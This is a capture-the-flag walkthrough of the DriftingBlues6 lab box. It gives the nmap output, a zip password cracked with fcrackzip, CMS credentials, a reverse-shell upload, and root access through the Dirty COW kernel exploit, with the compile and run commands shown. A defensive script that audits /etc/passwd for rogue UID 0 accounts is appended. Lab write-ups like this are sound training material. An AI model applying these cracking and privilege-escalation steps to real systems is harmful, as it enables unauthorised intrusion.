# Proving grounds Play: DriftingBlues6

Proving grounds Play - DriftingBlues6 CTF writeup.

### Nmap

```sh
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
```

### Web PORT: 80

![img](/files/JO83tT5d8JIKVGPaDAZc)

### Fuzzing for files

/robots.txt

**Robots File**

```
User-agent: *
Disallow: /textpattern/textpattern

dont forget to add .zip extension to your dir-brute
;)
```

#### Login

<http://192.168.151.219/textpattern/textpattern/>

![img](/files/fwr32Qkl4Tp8dd7ka61z)

A zip file was found at `http://192.168.151.219/spammer.zip`. The file is password protected, and the password can be easily cracked using the `fcrackzip` tool.

```sh
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt spammer.zip
```

Extracted password: `myspace4`

The extracted `creds.txt` contains login credentials for the CMS application.

```
mayer:lionheart
```

Log in to the application and upload a reverse shell.

![img](/files/hN0AC2p6act26lnTMtVv)

Checked the document root configuration and triggered the reverse shell file.

**Initial foothold obtained**

![img](/files/uZ050msaHcFQUAId640b)

### Privilege Escalation

Check the kernel version to escalate privileges.

```sh
uname -a
Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
```

Linux kernel <3.2.0-4-amd64 is vulnerable to [Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE\_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)](https://www.exploit-db.com/exploits/40839).

Download the exploit onto the attacking machine and compile the code as mentioned in the exploit.

Run the exploit as follows:

```sh
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password #password is the password for the user firefart created by the exploit
```

Switch user to `firefart` and use the password `password`.

![img](/files/foGjncMrDpHaaEoHbWcL)

**Root shell obtained**
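From the defending side, the /etc/passwd method used above leaves artifacts that are easy to check for: a UID 0 account not named `root`, with its password hash stored in `/etc/passwd` itself. The audit below is an added example, not part of the original writeup; the function names and the sample passwd content are constructed for illustration.

```sh
#!/bin/sh
# Added example: audit a passwd-format file for traces of the /etc/passwd method.
# Function names and sample data are constructed for illustration.

# audit_passwd FILE: prints one finding per line; returns 1 if anything was found.
audit_passwd() {
    awk -F: '
        NF == 0 || /^#/ { next }                      # skip blanks and comments
        NF != 7 { printf "MALFORMED line %d\n", NR; bad = 1; next }
        $1 == "root" { seen_root = 1 }
        $3 == 0 && $1 != "root" {                     # superuser under another name
            printf "UID0_NOT_ROOT %s\n", $1; bad = 1
        }
        $2 == "" { printf "EMPTY_PASSWORD %s\n", $1; bad = 1 }
        $2 != "" && $2 !~ /^(x|[*!].*)$/ {            # hash kept outside /etc/shadow
            printf "HASH_IN_PASSWD %s\n", $1; bad = 1
        }
        END {
            if (!seen_root) { print "ROOT_ENTRY_MISSING"; bad = 1 }
            exit bad + 0
        }
    ' "$1"
}

# Constructed sample of a tampered file: the first entry is a UID 0 account
# named firefart carrying a (placeholder) hash, and no root entry remains.
sample_tampered() {
    cat <<'EOF'
firefart:PLACEHOLDERHASH:0:0:sample:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
EOF
}

# Demo run on the constructed sample; on a real host pass /etc/passwd instead.
tmp=$(mktemp)
sample_tampered > "$tmp"
audit_passwd "$tmp" || echo "findings above need investigation"
rm -f "$tmp"
```

A clean file produces no output and exit status 0, so the function can be dropped into a cron job or a file-integrity hook that alerts on any non-zero result.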

Thanks for reading!

For more updates and insights, follow me on Twitter: [@thevillagehacker](https://twitter.com/thevillagehackr).

